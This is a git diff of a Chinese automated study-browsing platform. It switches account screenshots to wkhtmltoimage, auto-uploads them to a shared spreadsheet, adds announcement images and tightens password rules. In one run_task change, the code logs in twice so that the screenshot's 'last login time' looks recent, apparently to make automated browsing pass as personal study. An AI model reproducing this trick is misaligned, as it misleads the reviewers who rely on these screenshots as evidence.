if _WKHTMLTOIMAGE_HEIGHT > 0 and not _WKHTMLTOIMAGE_FULL_PAGE:
cmd.extend(["--height", str(_WKHTMLTOIMAGE_HEIGHT)])
if abs(_WKHTMLTOIMAGE_ZOOM - 1.0) > 1e-6:
cmd.extend(["--zoom", str(_WKHTMLTOIMAGE_ZOOM)])
if not _WKHTMLTOIMAGE_FULL_PAGE and (_WKHTMLTOIMAGE_CROP_WIDTH > 0 or _WKHTMLTOIMAGE_CROP_HEIGHT > 0):
cmd.extend(["--crop-x", str(_WKHTMLTOIMAGE_CROP_X), "--crop-y", str(_WKHTMLTOIMAGE_CROP_Y)])
if _WKHTMLTOIMAGE_CROP_WIDTH > 0:
cmd.extend(["--crop-w", str(_WKHTMLTOIMAGE_CROP_WIDTH)])
if _WKHTMLTOIMAGE_CROP_HEIGHT > 0:
cmd.extend(["--crop-h", str(_WKHTMLTOIMAGE_CROP_HEIGHT)])
if run_script:
cmd.extend(["--run-script", run_script])
if window_status:
cmd.extend(["--window-status", window_status])
if cookies_path:
cookie_pairs = _select_cookie_pairs(_read_cookie_pairs(cookies_path))
if cookie_pairs:
for name, value in cookie_pairs:
cmd.extend(["--cookie", name, value])
else:
cmd.extend(["--cookie-jar", cookies_path])
if proxy_server:
cmd.extend(["--proxy", proxy_server])
cmd.extend([url, output_path])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=_WKHTMLTOIMAGE_TIMEOUT_SECONDS)
if result.returncode != 0:
if log_callback:
err_msg = (result.stderr or result.stdout or "").strip()
log_callback(f"wkhtmltoimage 截图失败: {err_msg[:200]}")
return False
return True
except subprocess.TimeoutExpired:
if log_callback:
log_callback("wkhtmltoimage 截图超时")
return False
except Exception as e:
if log_callback:
log_callback(f"wkhtmltoimage 截图异常: {e}")
return False
def _emit(event: str, data: object, *, room: str | None = None) -> None:
try:
@@ -42,7 +202,7 @@ def take_screenshot_for_account(
task_start_time=None,
browse_result=None,
):
"""为账号任务完成后截图(使用工作线程池,真正的浏览器复用"""
"""为账号任务完成后截图(使用截图线程池并发执行"""
account = safe_get_account(user_id, account_id)
if not account:
return
@@ -63,9 +223,11 @@ def take_screenshot_for_account(
_emit("account_update", acc.to_dict(), room=f"user_{user_id}")
max_retries = 3
proxy_config = account.proxy_config if hasattr(account, "proxy_config") else None
proxy_server = proxy_config.get("server") if proxy_config else None
cookie_path = get_cookie_jar_path(account.username)
for attempt in range(1, max_retries + 1):
automation = None
try:
safe_update_task_status(
account_id,
@@ -75,27 +237,21 @@ def take_screenshot_for_account(
if attempt > 1:
log_to_client(f"🔄 第 {attempt} 次截图尝试...", user_id, account_id)
worker_id = browser_instance.get("worker_id", "?") if isinstance(browser_instance, dict) else "?"
use_count = browser_instance.get("use_count", 0) if isinstance(browser_instance, dict) else 0
log_to_client(
f"使用Worker-{browser_instance['worker_id']}的浏览器(已使用{browser_instance['use_count']}次)",
f"使用Worker-{worker_id}执行截图(已执行{use_count}次)",
user_id,
account_id,
)
proxy_config = account.proxy_config if hasattr(account, "proxy_config") else None
automation = PlaywrightAutomation(get_browser_manager(), account_id, proxy_config=proxy_config)
automation.playwright = browser_instance["playwright"]
automation.browser = browser_instance["browser"]
def custom_log(message: str):
log_to_client(message, user_id, account_id)
automation.log = custom_log
log_to_client("登录中...", user_id, account_id)
login_result = automation.quick_login(account.username, account.password, account.remember)
if not login_result["success"]:
error_message = login_result.get("message", "截图登录失败")
log_to_client(f"截图登录失败: {error_message}", user_id, account_id)
if not is_cookie_jar_fresh(cookie_path) or attempt > 1:
log_to_client("正在刷新登录态...", user_id, account_id)
if not _ensure_login_cookies(account, proxy_config, custom_log):
log_to_client("截图登录失败", user_id, account_id)
if attempt < max_retries:
log_to_client("将重试...", user_id, account_id)
time.sleep(2)
@@ -105,9 +261,6 @@ def take_screenshot_for_account(
log_to_client(f"导航到 '{browse_type}' 页面...", user_id, account_id)
# 截图场景:优先用 bz 参数直达页面(更稳定,避免页面按钮点击失败导致截图跑偏)
navigated = False
try:
from urllib.parse import urlsplit
parsed = urlsplit(config.ZSGL_LOGIN_URL)
@@ -117,58 +270,37 @@ def take_screenshot_for_account(
else:
bz = 2 # 应读
target_url = f"{base}/admin/center.aspx?bz={bz}"
# 目标:保留外层框架(左侧菜单/顶部栏),仅在 mainframe 内部导航到目标内容页
iframe = None
try:
iframe = automation.get_iframe_safe(retry=True, max_retries=5)
except Exception:
iframe = None
if iframe:
iframe.goto(target_url, timeout=60000)
current_url = getattr(iframe, "url", "") or ""
if "center.aspx" not in current_url:
raise RuntimeError(f"unexpected_iframe_url:{current_url}")
try:
iframe.wait_for_load_state("networkidle", timeout=10000)
except Exception:
pass
try:
iframe.wait_for_selector("table.ltable", timeout=5000)
except Exception:
pass
else:
# 兜底:若获取不到 iframe则退回到主页面直达
automation.main_page.goto(target_url, timeout=60000)
current_url = getattr(automation.main_page, "url", "") or ""
if "center.aspx" not in current_url:
raise RuntimeError(f"unexpected_url:{current_url}")
try:
automation.main_page.wait_for_load_state("networkidle", timeout=10000)
except Exception:
pass
try:
automation.main_page.wait_for_selector("table.ltable", timeout=5000)
except Exception:
pass
navigated = True
except Exception as nav_error:
log_to_client(f"直达页面失败,将尝试按钮切换: {str(nav_error)[:120]}", user_id, account_id)
# 兼容兜底:若直达失败,则回退到原有按钮切换方式
if not navigated:
result = automation.browse_content(
navigate_only=True,
browse_type=browse_type,
auto_next_page=False,
auto_view_attachments=False,
interval=0,
should_stop_callback=None,
index_url = config.ZSGL_INDEX_URL or f"{base}/admin/index.aspx"
run_script = (
"(function(){"
"function done(){window.status='ready';}"
"function ensureNav(){try{if(typeof loadMenuTree==='function'){loadMenuTree(true);}}catch(e){}}"
"function expandMenu(){"
"try{var body=document.body;if(body&&body.classList.contains('lay-mini')){body.classList.remove('lay-mini');}}catch(e){}"
"try{if(typeof mainPageResize==='function'){mainPageResize();}}catch(e){}"
"try{if(typeof toggleMainMenu==='function' && document.body && document.body.classList.contains('lay-mini')){toggleMainMenu();}}catch(e){}"
"try{var navRight=document.querySelector('.nav-right');if(navRight){navRight.style.display='block';}}catch(e){}"
"try{var mainNav=document.getElementById('main-nav');if(mainNav){mainNav.style.display='block';}}catch(e){}"
"}"
"function navReady(){"
"try{var nav=document.getElementById('sidebar-nav');return nav && nav.querySelectorAll('a').length>0;}catch(e){return false;}"
"}"
"function frameReady(){"
"try{var f=document.getElementById('mainframe');return f && f.contentDocument && f.contentDocument.readyState==='complete';}catch(e){return false;}"
"}"
"function check(){"
"if(navReady() && frameReady()){done();return;}"
"setTimeout(check,300);"
"}"
"var f=document.getElementById('mainframe');"
"ensureNav();"
"expandMenu();"
"if(!f){done();return;}"
f"f.src='{target_url}';"
"f.onload=function(){ensureNav();expandMenu();setTimeout(check,300);};"
"setTimeout(check,5000);"
"})();"
)
if not result.success and result.error_message:
log_to_client(f"导航警告: {result.error_message}", user_id, account_id)
time.sleep(2)
timestamp = get_beijing_now().strftime("%Y%m%d_%H%M%S")
@@ -178,7 +310,22 @@ def take_screenshot_for_account(
screenshot_filename = f"{username_prefix}_{login_account}_{browse_type}_{timestamp}.jpg"
screenshot_path = os.path.join(SCREENSHOTS_DIR, screenshot_filename)
if automation.take_screenshot(screenshot_path):
cookies_for_shot = cookie_path if is_cookie_jar_fresh(cookie_path) else None
if take_screenshot_wkhtmltoimage(
index_url,
screenshot_path,
cookies_path=cookies_for_shot,
proxy_server=proxy_server,
run_script=run_script,
window_status="ready",
log_callback=custom_log,
) or take_screenshot_wkhtmltoimage(
target_url,
screenshot_path,
cookies_path=cookies_for_shot,
proxy_server=proxy_server,
log_callback=custom_log,
):
if os.path.exists(screenshot_path) and os.path.getsize(screenshot_path) > 1000:
log_to_client(f"✓ 截图成功: {screenshot_filename}", user_id, account_id)
return {"success": True, "filename": screenshot_filename}
@@ -197,15 +344,6 @@ def take_screenshot_for_account(
if attempt < max_retries:
log_to_client("将重试...", user_id, account_id)
time.sleep(2)
finally:
if automation:
try:
if automation.context:
automation.context.close()
automation.context = None
automation.page = None
except Exception as e:
logger.debug(f"关闭context时出错: {e}")
return {"success": False, "error": "截图失败已重试3次"}
@@ -250,6 +388,35 @@ def take_screenshot_for_account(
account_name = account.remark if account.remark else account.username
try:
if screenshot_path and result and result.get("success"):
cfg = database.get_system_config() or {}
if int(cfg.get("kdocs_enabled", 0) or 0) == 1:
doc_url = (cfg.get("kdocs_doc_url") or "").strip()
if doc_url:
user_cfg = database.get_user_kdocs_settings(user_id) or {}
if int(user_cfg.get("kdocs_auto_upload", 0) or 0) == 1:
unit = (user_cfg.get("kdocs_unit") or cfg.get("kdocs_default_unit") or "").strip()
name = (account.remark or "").strip()
if unit and name:
from services.kdocs_uploader import get_kdocs_uploader
ok = get_kdocs_uploader().enqueue_upload(
user_id=user_id,
account_id=account_id,
unit=unit,
name=name,
image_path=screenshot_path,
)
if not ok:
log_to_client("表格上传排队失败: 队列已满", user_id, account_id)
else:
if not unit:
log_to_client("表格上传跳过: 未配置县区", user_id, account_id)
if not name:
log_to_client("表格上传跳过: 账号备注为空", user_id, account_id)
except Exception as kdocs_error:
logger.warning(f"表格上传任务提交失败: {kdocs_error}")
if batch_id:
_batch_task_record_result(
batch_id=batch_id,

View File

@@ -573,8 +573,16 @@ def run_task(user_id, account_id, browse_type, enable_screenshot=True, source="m
with APIBrowser(log_callback=custom_log, proxy_config=proxy_config) as api_browser:
if api_browser.login(account.username, account.password):
log_to_client("✓ 登录成功", user_id, account_id)
api_browser.save_cookies_for_playwright(account.username)
log_to_client("首次登录成功,刷新登录时间...", user_id, account_id)
# 二次登录:让"上次登录时间"变成刚才首次登录的时间
# 这样截图时显示的"上次登录时间"就是几秒前而不是昨天
if api_browser.login(account.username, account.password):
log_to_client("✓ 二次登录成功!", user_id, account_id)
else:
log_to_client("⚠ 二次登录失败,继续使用首次登录状态", user_id, account_id)
api_browser.save_cookies_for_screenshot(account.username)
database.reset_account_login_status(account_id)
if not account.remark:

View File

@@ -5,8 +5,8 @@
<link rel="icon" type="image/svg+xml" href="./vite.svg" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>后台管理 - 知识管理平台</title>
<script type="module" crossorigin src="./assets/index-CdjS44Uj.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-EWm4DZW8.css">
<script type="module" crossorigin src="./assets/index-DKH_HvPt.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-_5Ec1Hmd.css">
</head>
<body>
<div id="app"></div>

View File

@@ -4,8 +4,8 @@
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>知识管理平台</title>
<script type="module" crossorigin src="./assets/index-DhsLPY8p.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-CD3NfpmF.css">
<script type="module" crossorigin src="./assets/index-7hTgh8K-.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-BVjJVlht.css">
</head>
<body>
<noscript>该页面需要启用 JavaScript 才能使用。</noscript>

View File

@@ -5,13 +5,48 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>后台管理 - 知识管理平台</title>
{% for css_file in admin_spa_css_files %}
{% if admin_spa_build_id %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file, v=admin_spa_build_id) }}" />
{% else %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" />
{% endif %}
{% endfor %}
</head>
<body>
<noscript>该页面需要启用 JavaScript 才能使用。</noscript>
<script>
(function () {
var search = window.location.search || ''
if (search.indexOf('legacy=1') !== -1) {
return
}
var needsLegacy = false
try {
new Function('let a = 1; const b = 2;')
} catch (e) {
needsLegacy = true
}
if (!window.Promise || !window.Proxy) {
needsLegacy = true
}
if (needsLegacy) {
var href = window.location.href
var hash = ''
var hashIndex = href.indexOf('#')
if (hashIndex !== -1) {
hash = href.slice(hashIndex)
href = href.slice(0, hashIndex)
}
var sep = href.indexOf('?') !== -1 ? '&' : '?'
window.location.replace(href + sep + 'legacy=1' + hash)
}
})()
</script>
<div id="app"></div>
{% if admin_spa_build_id %}
<script type="module" src="{{ url_for('serve_static', filename=admin_spa_js_file, v=admin_spa_build_id) }}"></script>
{% else %}
<script type="module" src="{{ url_for('serve_static', filename=admin_spa_js_file) }}"></script>
{% endif %}
</body>
</html>

View File

@@ -754,9 +754,6 @@
<div id="tab-pending" class="tab-content active">
<h3 style="margin-bottom: 15px; font-size: 16px;">用户注册审核</h3>
<div id="pendingUsersList"></div>
<h3 style="margin-top: 30px; margin-bottom: 15px; font-size: 16px;">密码重置审核</h3>
<div id="passwordResetsList"></div>
</div>
<!-- 所有用户 -->
@@ -811,7 +808,7 @@
<label>截图最大并发数</label>
<input type="number" id="maxScreenshotConcurrent" min="1" value="3" style="max-width: 200px;">
<div style="font-size: 12px; color: #666; margin-top: 5px;">
说明:同时进行截图的最大数量。每个浏览器约占用200MB内存
说明:同时进行截图的最大数量。wkhtmltoimage 资源占用较低,可按需提高
</div>
</div>
@@ -825,7 +822,7 @@
启用定时任务
</label>
<div style="font-size: 12px; color: #666; margin-top: 5px;">
开启后,系统将在指定时间自动执行所有账号的浏览任务(不包含截图)
开启后,系统将在指定时间自动执行所有账号的浏览任务,是否截图由下方开关决定。
</div>
</div>
@@ -882,6 +879,16 @@
</div>
</div>
<div class="form-group" id="scheduleScreenshotGroup" style="display: none;">
<label style="display: flex; align-items: center; gap: 10px;">
<input type="checkbox" id="enableScreenshot" style="width: auto; max-width: none;">
定时任务截图
</label>
<div style="font-size: 12px; color: #666; margin-top: 5px;">
开启后,定时任务执行时会生成截图。
</div>
</div>
<div id="scheduleActions" style="margin-top: 15px; display: flex; gap: 10px;">
<button class="btn btn-primary" onclick="updateSchedule()">保存定时任务配置</button>
<button class="btn btn-success" onclick="executeScheduleNow()" style="background: linear-gradient(135deg, #11998e 0%, #38ef7d 100%);">
@@ -1226,6 +1233,18 @@
<label>公告内容</label>
<textarea id="announcementContent" rows="5" placeholder="请输入公告内容(将以弹窗形式展示)"></textarea>
</div>
<div class="form-group">
<label>公告图片(可选)</label>
<div style="display: flex; align-items: center; gap: 10px; flex-wrap: wrap;">
<button class="btn btn-secondary" onclick="triggerAnnouncementImageUpload()">+ 上传图片</button>
<button class="btn" onclick="clearAnnouncementImage()" style="background: #eee;">移除</button>
<input type="file" id="announcementImageFile" accept="image/*" style="display: none;" onchange="uploadAnnouncementImageFile()">
<input type="text" id="announcementImageUrl" placeholder="上传后自动填充" readonly style="flex: 1; min-width: 220px;">
</div>
<div id="announcementImagePreview" style="display: none; margin-top: 8px;">
<img id="announcementImagePreviewImg" src="" alt="公告图片预览" style="max-width: 260px; max-height: 160px; border-radius: 8px; border: 1px solid #e5e7eb; object-fit: contain;">
</div>
</div>
<div style="display: flex; gap: 10px; flex-wrap: wrap;">
<button class="btn btn-primary" onclick="createAnnouncement(true)">发布并启用</button>
<button class="btn btn-secondary" onclick="createAnnouncement(false)">保存但不启用</button>
@@ -1536,7 +1555,6 @@
loadAnnouncements();
loadSystemConfig();
loadProxyConfig();
loadPasswordResets(); // 修复: 初始化时也加载密码重置申请
loadFeedbacks(); // 加载反馈统计更新徽章
// 恢复上次的标签页
@@ -1626,6 +1644,7 @@
<th style="width: 70px;">ID</th>
<th>标题</th>
<th style="width: 90px;">状态</th>
<th style="width: 70px;">图片</th>
<th style="width: 170px;">创建时间</th>
<th style="width: 220px;">操作</th>
</tr>
@@ -1640,6 +1659,7 @@
${a.is_active ? '启用' : '停用'}
</span>
</td>
<td>${a.image_url ? '有图' : '-'}</td>
<td>${a.created_at || '-'}</td>
<td>
<div class="action-buttons">
@@ -1664,17 +1684,82 @@
const content = document.getElementById('announcementContent');
if (title) title.value = '';
if (content) content.value = '';
clearAnnouncementImage();
}
function triggerAnnouncementImageUpload() {
const input = document.getElementById('announcementImageFile');
if (input) input.click();
}
async function uploadAnnouncementImageFile() {
const input = document.getElementById('announcementImageFile');
const urlInput = document.getElementById('announcementImageUrl');
const file = input?.files?.[0];
if (!file || !urlInput) return;
if (file.type && !String(file.type).startsWith('image/')) {
showNotification('请选择图片文件', 'error');
input.value = '';
return;
}
const formData = new FormData();
formData.append('file', file);
try {
const response = await fetch('/yuyx/api/announcements/upload_image', {
method: 'POST',
body: formData
});
const data = await response.json();
if (!response.ok || !data?.success) {
showNotification(data?.error || '上传失败', 'error');
return;
}
urlInput.value = data.url || '';
updateAnnouncementImagePreview();
showNotification('上传成功', 'success');
} catch (e) {
showNotification('上传失败', 'error');
} finally {
input.value = '';
}
}
function clearAnnouncementImage() {
const imageUrl = document.getElementById('announcementImageUrl');
const imageFile = document.getElementById('announcementImageFile');
if (imageUrl) imageUrl.value = '';
if (imageFile) imageFile.value = '';
updateAnnouncementImagePreview();
}
function updateAnnouncementImagePreview() {
const imageUrl = document.getElementById('announcementImageUrl');
const previewWrap = document.getElementById('announcementImagePreview');
const previewImg = document.getElementById('announcementImagePreviewImg');
if (!imageUrl || !previewWrap || !previewImg) return;
const url = String(imageUrl.value || '').trim();
if (url) {
previewImg.src = url;
previewWrap.style.display = 'block';
} else {
previewImg.removeAttribute('src');
previewWrap.style.display = 'none';
}
}
function viewAnnouncement(id) {
const announcement = announcements.find(a => a.id === id);
if (!announcement) return;
alert(`标题:${announcement.title || ''}\n\n内容:\n${announcement.content || ''}`);
const imageLine = announcement.image_url ? `\n图片:${announcement.image_url}` : '';
alert(`标题:${announcement.title || ''}${imageLine}\n\n内容:\n${announcement.content || ''}`);
}
async function createAnnouncement(isActive) {
const title = (document.getElementById('announcementTitle')?.value || '').trim();
const content = (document.getElementById('announcementContent')?.value || '').trim();
const image_url = (document.getElementById('announcementImageUrl')?.value || '').trim();
if (!title || !content) {
showNotification('标题和内容不能为空', 'error');
return;
@@ -1684,7 +1769,7 @@
const response = await fetch('/yuyx/api/announcements', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ title, content, is_active: !!isActive })
body: JSON.stringify({ title, content, image_url, is_active: !!isActive })
});
const data = await response.json();
if (!response.ok) {
@@ -2048,8 +2133,13 @@
return;
}
if (newPassword.length < 6) {
showNotification('密码至少6个字符', 'error');
if (newPassword.length < 8) {
showNotification('密码长度至少8位', 'error');
return;
}
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
showNotification('密码必须包含字母和数字', 'error');
return;
}
@@ -2107,6 +2197,8 @@
document.getElementById('scheduleEnabled').checked = config.schedule_enabled === 1;
document.getElementById('scheduleTime').value = config.schedule_time || '02:00';
document.getElementById('scheduleBrowseType').value = config.schedule_browse_type || '应读';
var enableScreenshot = config.enable_screenshot;
document.getElementById('enableScreenshot').checked = enableScreenshot === 1 || enableScreenshot === true || enableScreenshot === undefined;
// 加载星期选择
const weekdays = config.schedule_weekdays || '1,2,3,4,5,6,7';
@@ -2132,15 +2224,18 @@
const timeGroup = document.getElementById('scheduleTimeGroup');
const browseTypeGroup = document.getElementById('scheduleBrowseTypeGroup');
const weekdaysGroup = document.getElementById('scheduleWeekdaysGroup');
const screenshotGroup = document.getElementById('scheduleScreenshotGroup');
if (enabled) {
timeGroup.style.display = 'block';
browseTypeGroup.style.display = 'block';
weekdaysGroup.style.display = 'block';
screenshotGroup.style.display = 'block';
} else {
timeGroup.style.display = 'none';
browseTypeGroup.style.display = 'none';
weekdaysGroup.style.display = 'none';
screenshotGroup.style.display = 'none';
}
// 保存按钮始终显示,无论是开启还是关闭定时任务
}
@@ -2313,6 +2408,7 @@
const enabled = document.getElementById('scheduleEnabled').checked;
const time = document.getElementById('scheduleTime').value;
const browseType = document.getElementById('scheduleBrowseType').value;
const enableScreenshot = document.getElementById('enableScreenshot').checked;
// 获取选中的星期
const selectedWeekdays = [];
@@ -2330,7 +2426,7 @@
const weekdayDisplay = selectedWeekdays.map(d => weekdayNames[parseInt(d)]).join('、');
const message = enabled
? `确定启用定时任务吗?\n\n执行时间: 每天 ${time}\n执行日期: ${weekdayDisplay}\n浏览类型: ${browseType}\n\n系统将自动执行所有账号的浏览任务(不包含截图)`
? `确定启用定时任务吗?\n\n执行时间: 每天 ${time}\n执行日期: ${weekdayDisplay}\n浏览类型: ${browseType}\n截图: ${enableScreenshot ? '截图' : '不截图'}\n\n系统将自动执行所有账号的浏览任务`
: `确定关闭定时任务吗?`;
if (!confirm(message)) return;
@@ -2343,7 +2439,8 @@
schedule_enabled: enabled ? 1 : 0,
schedule_time: time,
schedule_browse_type: browseType,
schedule_weekdays: weekdaysStr
schedule_weekdays: weekdaysStr,
enable_screenshot: enableScreenshot ? 1 : 0
})
});
@@ -2771,119 +2868,21 @@
} else if (tabName === 'logs') {
loadLogUserOptions();
loadTaskLogs();
} else if (tabName === 'pending') {
loadPasswordResets();
}
};
// ==================== 密码重置功能 ====================
// 管理员直接重置用户密码
async function resetUserPassword(userId) {
const newPassword = prompt('请输入新密码至少8位且包含字母和数字:');
if (!newPassword) return;
let passwordResets = [];
// 加载密码重置申请列表
async function loadPasswordResets() {
try {
const response = await fetch('/yuyx/api/password_resets');
if (response.ok) {
passwordResets = await response.json();
renderPasswordResets();
}
} catch (error) {
console.error('加载密码重置申请失败:', error);
}
}
// 渲染密码重置申请列表
function renderPasswordResets() {
const container = document.getElementById('passwordResetsList');
if (passwordResets.length === 0) {
container.innerHTML = '<div class="empty-message">暂无密码重置申请</div>';
if (newPassword.length < 8) {
showNotification('密码长度至少8位', 'error');
return;
}
container.innerHTML = `
<div class="table-container">
<table>
<thead>
<tr>
<th>申请ID</th>
<th>用户名</th>
<th>邮箱</th>
<th>申请时间</th>
<th>操作</th>
</tr>
</thead>
<tbody>
${passwordResets.map(reset => `
<tr>
<td>${reset.id}</td>
<td><strong>${escapeHtml(reset.username)}</strong></td>
<td>${escapeHtml(reset.email || '-')}</td>
<td>${escapeHtml(reset.created_at)}</td>
<td>
<div class="action-buttons">
<button class="btn btn-small btn-success" onclick="approvePasswordReset(${reset.id})">批准</button>
<button class="btn btn-small btn-danger" onclick="rejectPasswordReset(${reset.id})">拒绝</button>
</div>
</td>
</tr>
`).join('')}
</tbody>
</table>
</div>
`;
}
// 批准密码重置申请
async function approvePasswordReset(requestId) {
if (!confirm('确定批准该密码重置申请吗?')) return;
try {
const response = await fetch(`/yuyx/api/password_resets/${requestId}/approve`, {
method: 'POST'
});
const data = await response.json();
if (response.ok) {
showNotification('密码重置申请已批准', 'success');
loadPasswordResets();
} else {
showNotification('批准失败: ' + data.error, 'error');
}
} catch (error) {
showNotification('批准失败: ' + error.message, 'error');
}
}
// 拒绝密码重置申请
async function rejectPasswordReset(requestId) {
if (!confirm('确定拒绝该密码重置申请吗?')) return;
try {
const response = await fetch(`/yuyx/api/password_resets/${requestId}/reject`, {
method: 'POST'
});
const data = await response.json();
if (response.ok) {
showNotification('密码重置申请已拒绝', 'success');
loadPasswordResets();
} else {
showNotification('拒绝失败: ' + data.error, 'error');
}
} catch (error) {
showNotification('拒绝失败: ' + error.message, 'error');
}
}
// 管理员直接重置用户密码
async function resetUserPassword(userId) {
const newPassword = prompt('请输入新密码至少6位:');
if (!newPassword) return;
if (newPassword.length < 6) {
showNotification('密码长度至少6位', 'error');
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
showNotification('密码必须包含字母和数字', 'error');
return;
}

View File

@@ -5,7 +5,11 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>知识管理平台</title>
{% for css_file in app_spa_css_files %}
{% if app_spa_build_id %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file, v=app_spa_build_id) }}" />
{% else %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" />
{% endif %}
{% endfor %}
</head>
<body>
@@ -16,6 +20,10 @@
window.__APP_INITIAL_STATE__ = {{ app_spa_initial_state | tojson }};
</script>
{% endif %}
{% if app_spa_build_id %}
<script type="module" src="{{ url_for('serve_static', filename=app_spa_js_file, v=app_spa_build_id) }}"></script>
{% else %}
<script type="module" src="{{ url_for('serve_static', filename=app_spa_js_file) }}"></script>
{% endif %}
</body>
</html>

File diff suppressed because it is too large Load Diff

View File

@@ -1,449 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>登录 - 知识管理平台</title>
<style>
:root {
--md-primary: #1976D2;
--md-primary-dark: #1565C0;
--md-primary-light: #BBDEFB;
--md-background: #FAFAFA;
--md-surface: #FFFFFF;
--md-error: #B00020;
--md-success: #4CAF50;
--md-on-primary: #FFFFFF;
--md-on-surface: #212121;
--md-on-surface-medium: #666666;
--md-shadow-lg: 0 8px 30px rgba(0,0,0,0.12);
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
padding: 20px;
}
.login-card {
background: var(--md-surface);
border-radius: 16px;
box-shadow: var(--md-shadow-lg);
width: 100%;
max-width: 400px;
overflow: hidden;
}
.login-header {
background: var(--md-primary);
color: var(--md-on-primary);
padding: 32px 24px;
text-align: center;
}
.login-header .logo { font-size: 48px; margin-bottom: 12px; }
.login-header h1 { font-size: 24px; font-weight: 500; margin-bottom: 4px; }
.login-header p { font-size: 14px; opacity: 0.9; }
.login-body { padding: 32px 24px; }
.form-group { margin-bottom: 24px; }
.form-group label { display: block; font-size: 14px; font-weight: 500; color: var(--md-on-surface-medium); margin-bottom: 8px; }
.form-group input {
width: 100%;
padding: 14px 16px;
border: 2px solid #E0E0E0;
border-radius: 8px;
font-size: 16px;
transition: all 0.2s;
background: #FAFAFA;
}
.form-group input:focus {
outline: none;
border-color: var(--md-primary);
background: var(--md-surface);
box-shadow: 0 0 0 3px var(--md-primary-light);
}
.captcha-row { display: flex; gap: 12px; align-items: center; }
.captcha-row input { flex: 1; }
.captcha-code {
font-size: 20px;
font-weight: bold;
letter-spacing: 4px;
color: var(--md-primary);
padding: 10px 16px;
background: var(--md-primary-light);
border-radius: 8px;
user-select: none;
}
.captcha-refresh {
padding: 10px 16px;
background: #F5F5F5;
border: none;
border-radius: 8px;
cursor: pointer;
font-size: 18px;
}
.captcha-refresh:hover { background: #EEEEEE; }
.forgot-link { text-align: right; margin-top: -16px; margin-bottom: 24px; }
.forgot-link a { color: var(--md-primary); text-decoration: none; font-size: 14px; font-weight: 500; }
.forgot-link a:hover { text-decoration: underline; }
.btn-login {
width: 100%;
padding: 16px;
background: var(--md-primary);
color: var(--md-on-primary);
border: none;
border-radius: 8px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: all 0.2s;
text-transform: uppercase;
letter-spacing: 1px;
}
.btn-login:hover { background: var(--md-primary-dark); box-shadow: 0 4px 12px rgba(25, 118, 210, 0.4); }
.register-link {
text-align: center;
margin-top: 24px;
padding-top: 24px;
border-top: 1px solid #E0E0E0;
color: var(--md-on-surface-medium);
font-size: 14px;
}
.register-link a { color: var(--md-primary); text-decoration: none; font-weight: 600; }
.register-link a:hover { text-decoration: underline; }
.message { padding: 12px 16px; border-radius: 8px; margin-bottom: 20px; font-size: 14px; display: none; }
.message.error { background: #FFEBEE; color: var(--md-error); border: 1px solid #FFCDD2; }
.message.success { background: #E8F5E9; color: var(--md-success); border: 1px solid #C8E6C9; }
.modal-overlay {
position: fixed; top: 0; left: 0; right: 0; bottom: 0;
background: rgba(0,0,0,0.5);
display: flex; justify-content: center; align-items: center;
opacity: 0; visibility: hidden; transition: all 0.3s; z-index: 1000; padding: 20px;
}
.modal-overlay.active { opacity: 1; visibility: visible; }
.modal {
background: var(--md-surface);
border-radius: 16px;
width: 100%; max-width: 400px;
box-shadow: var(--md-shadow-lg);
transform: translateY(-20px); transition: transform 0.3s;
}
.modal-overlay.active .modal { transform: translateY(0); }
.modal-header { padding: 24px; border-bottom: 1px solid #E0E0E0; }
.modal-header h2 { font-size: 20px; font-weight: 500; margin-bottom: 4px; }
.modal-header p { font-size: 14px; color: var(--md-on-surface-medium); }
.modal-body { padding: 24px; }
.modal-footer { padding: 16px 24px; border-top: 1px solid #E0E0E0; display: flex; gap: 12px; justify-content: flex-end; }
.btn-secondary { padding: 12px 24px; background: #F5F5F5; color: var(--md-on-surface); border: none; border-radius: 8px; font-size: 14px; font-weight: 600; cursor: pointer; }
.btn-secondary:hover { background: #EEEEEE; }
.btn-primary { padding: 12px 24px; background: var(--md-primary); color: var(--md-on-primary); border: none; border-radius: 8px; font-size: 14px; font-weight: 600; cursor: pointer; }
.btn-primary:hover { background: var(--md-primary-dark); }
@media (max-width: 480px) {
body { padding: 12px; }
.login-card { max-width: 100%; }
.login-header { padding: 24px 20px; }
.login-header .logo { font-size: 40px; margin-bottom: 10px; }
.login-header h1 { font-size: 20px; }
.login-header p { font-size: 13px; }
.login-body { padding: 24px 20px; }
.form-group { margin-bottom: 20px; }
.form-group label { font-size: 13px; }
.form-group input { padding: 12px 14px; font-size: 16px; } /* iOS防止自动缩放 */
.captcha-code { padding: 8px 12px; font-size: 18px; letter-spacing: 3px; }
.captcha-refresh { padding: 8px 12px; font-size: 16px; }
.btn-login { padding: 14px; font-size: 15px; }
.modal { max-width: 100%; }
.modal-header, .modal-body { padding: 20px; }
.modal-header h2 { font-size: 18px; }
.modal-footer { padding: 14px 20px; flex-direction: column; }
.modal-footer button { width: 100%; }
}
</style>
</head>
<body>
<div class="login-card">
<div class="login-header">
<div class="logo">📚</div>
<h1>知识管理平台</h1>
<p>自动化浏览学习内容</p>
</div>
<div class="login-body">
<div id="errorMessage" class="message error"></div>
